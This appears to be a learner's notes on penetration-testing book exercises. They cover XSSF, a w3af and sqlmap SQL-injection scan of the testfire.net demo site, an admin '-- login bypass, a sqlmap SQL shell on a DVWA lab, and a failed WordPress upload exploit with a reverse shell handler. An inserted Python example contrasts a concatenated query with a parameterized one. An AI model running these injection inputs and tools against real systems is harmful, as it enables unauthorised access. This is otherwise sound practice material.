"Metasploit Devil Training Camp", Chapter 4 (Part 2)

Source: Internet
Author: User

p163 XSSF

Kali 2.0 does not include XSSF by default, so download it first: https://code.google.com/archive/p/xssf/downloads

Unzip the downloaded zip file, merge the data, plugins, lab and other folders into the corresponding folders under /usr/share/metasploit-framework/, then load XSSF in msfconsole.

I followed the book, but the final attack did not succeed!

8  the ['...] ['exploit:windows/browser/ie_createobject'
[*] Exploit execution started, press [CTRL + C] to stop it!
[+] Remaining victims to attack: [[1] (1)]  (it hangs here)
^C[-] Exploit interrupted by the console user

p180 Practical Work

1. Probing SQL injection vulnerability in www.testfire.net:

[email protected]:~# w3af_console
w3af>>> plugins
w3af/plugins>>> audit sqli
w3af/plugins>>> crawl web_spider
w3af/plugins>>> back
w3af>>> target
w3af/config:target>>> set target http://www.testfire.net/bank/login.aspx
w3af/config:target>>> back
The configuration has been saved.
w3af>>> plugins
w3af/plugins>>> output html_file
w3af/plugins>>> output config html_file
w3af/plugins/output/config:html_file>>> set verbose True
w3af/plugins/output/config:html_file>>> back
The configuration has been saved.
w3af/plugins>>> back
w3af>>> start

The scan successfully found 8 URLs and different injection points.

Scan with sqlmap.

" http://www.testfire.net/bank/login.aspx " " Uid=admin&passw=a&btnsubmit=login "

It detected some information about the back-end database.

Logging in at http://www.testfire.net/bank/login.aspx is easy by entering admin '-- as the input.

But how do you go further and get the information in the database? I'm not done with that yet.
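Why a quote-and-comment input like the one above gets past a login form, and the parameterized query that stops it, shown as an added example that is not part of the original post. The table layout, the sample account and the SQLite back end are assumptions made for the illustration; the field names uid and passw follow the form data above.

```python
import sqlite3


def make_db():
    """Constructed sample data: one account in an in-memory database."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (uid TEXT PRIMARY KEY, passw TEXT)")
    # Plain-text password only to keep the illustration short.
    db.execute("INSERT INTO users VALUES ('admin', 's3cret-constructed')")
    return db


def vulnerable_query(uid, passw):
    # The input is pasted into the SQL text, so a quote in uid closes the
    # string literal and "--" turns the password check into a comment.
    return ("SELECT uid FROM users WHERE uid = '" + uid +
            "' AND passw = '" + passw + "'")


def login_vulnerable(db, uid, passw):
    return db.execute(vulnerable_query(uid, passw)).fetchone() is not None


def login_safe(db, uid, passw):
    # Placeholders send the input as data; the quote is just a character
    # in the value being compared and never becomes SQL syntax.
    row = db.execute("SELECT uid FROM users WHERE uid = ? AND passw = ?",
                     (uid, passw)).fetchone()
    return row is not None


if __name__ == "__main__":
    db = make_db()
    # Written without the space: SQLite compares trailing spaces strictly,
    # so 'admin ' would not match the stored 'admin'.
    payload = "admin'--"
    print(vulnerable_query(payload, "a"))
    print("concatenated query accepts it:", login_vulnerable(db, payload, "a"))
    print("parameterized query accepts it:", login_safe(db, payload, "a"))
```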

2. Just follow p163 of the book.

3. WXF: https://github.com/forced-request/wxf

After downloading, unzip it, switch to the unzipped directory and run ./console; it reports:

/usr/lib/ruby/2.2.0/rubygems/core_ext/kernel_require.rb:si:in `require': cannot load such file -- iconv (LoadError)

Because I am not familiar with Ruby, I did not understand the fixes I found online either, so I skipped this one.

4. I chose this vulnerability to test: https://www.exploit-db.com/exploits/37182/

However, the test results were:

I do not know whether this is an issue with the back-end server software version.

5. I do not know how to do this one. Skipping it for now.

6. Successfully got a SQL shell! With the following command:

' http://www.dvssc.com/dvwa/vulnerabilities/sqli/?id=aa&Submit=Submit# '  --cookie='security=low; PHPSESSID=7918OEOATNUR63RQ8BOKN88SD2' --sql-shell

7. p177

I followed the prompts step by step, but without success:

[*] Started reverse TCP handler on 10.10.10.128:4444
[*] Successfully uploaded shell.
[*] Trying to access shell at <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><head><title>413 Request Entity Too Large</title></head><body>The requested resource<br/>/wordpress//wp-content/plugins/1-flash-gallery/upload.php<br/>does not allow request data with POST requests, or the amount of data provided in the request exceeds the capacity limit.</body>...
[*] Exploit completed, but no session was created.
